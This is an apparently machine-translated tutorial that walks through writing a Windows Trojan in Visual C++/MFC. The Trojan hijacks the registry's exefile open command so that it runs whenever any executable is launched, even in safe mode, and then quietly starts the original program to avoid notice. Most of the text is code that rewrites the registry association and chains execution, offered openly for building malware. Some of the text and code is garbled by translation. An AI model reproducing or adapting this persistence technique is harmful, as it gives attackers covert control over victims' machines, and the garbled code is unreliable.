The programming idea of file association type Trojan Horse

We know that in general, if you want to start the program, you must write the program in the registry

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Hkey_local_machine\software\microsoft\windows\currentversion\runservice

In the environment, because this value is familiar to everyone, so it is easy to find out, and into the Windows Protection mode these programs will not run, but if we have our program in the registry is associated with a good result.

The value in the registry HKEY_CLASSES_ROOT\Exefile\Shell\Open\Command is an executable program *.exe

The file is associated with the default ""%1 "

%* ", if this program is changed to our Trojan program, in that case, each execution of an executable program will execute our program, and will not carry out the original program, so that our Trojan started, we have to do the work is our Trojan start, then execute the original program, It seems like nothing has happened to the average person. All right, move, let's start doing one.

L First Use VC to establish a dialog box based program Srart

In Cstartdlg add public variable HANDLE Hmutex; Prevent our Trojans from running many times.

L Add the following function to Cstartdlg::oninitdialog ():

CString str;
Str. Format ("%s", AfxGetApp ()->m_lpcmdline);//Get incoming command line arguments
const char *mutexobject= "Mystart";//Create Mutex
Hmutex=null;
Hmutex=::createmutex (False,false,mutexobject);
if (hmutex!=null)
{
DWORD Err=getlasterror ();
if (err==error_already_exists)
::P ostquitmessage (0);//If you find that the same program is already running, exit
}
if (str!= "")
{
CString temp;
Char ch;
int length =str. GetLength ();
for (int i=0;i<length;i++)
{
Ch=str. GetAt (i);
if (ch== ' \ ")
temp=temp+ "\\\\";
else temp=temp+ch;
}
temp = temp. Left (temp. GetLength ()-2);
temp = temp. Mid (1);
The above function is to change all the "\" in the string into "\"
Char str1[]= "\"%1\ "%*";
:: RegSetValue (HKEY_CLASSES_ROOT, "Exefile\\shell\\open\\command",
REG_SZ, (LPCTSTR) str1, strlen (str1) + 1);
//
Before executing the original program must restore the registry, otherwise use ShellExecute or execute our trojan program.
ShellExecute (NULL, "open", temp,null,null,sw_show);//execute the original program
}
After the execution of the program is completed, change the registry to the Trojan program we want to start
TCHAR str2[256];
Get program Full path name
GetModuleFileName (NULL, str2, 255);
strcat (str2, "\"%1\ "%*");
:: RegSetValue (HKEY_CLASSES_ROOT, "Exefile\\shell\\open\\command",
REG_SZ, (LPCTSTR) str2, strlen (str2) + 1);
As soon as the program runs, it will execute our startProgram. Even in safe mode, you run our program as long as you execute the executable program.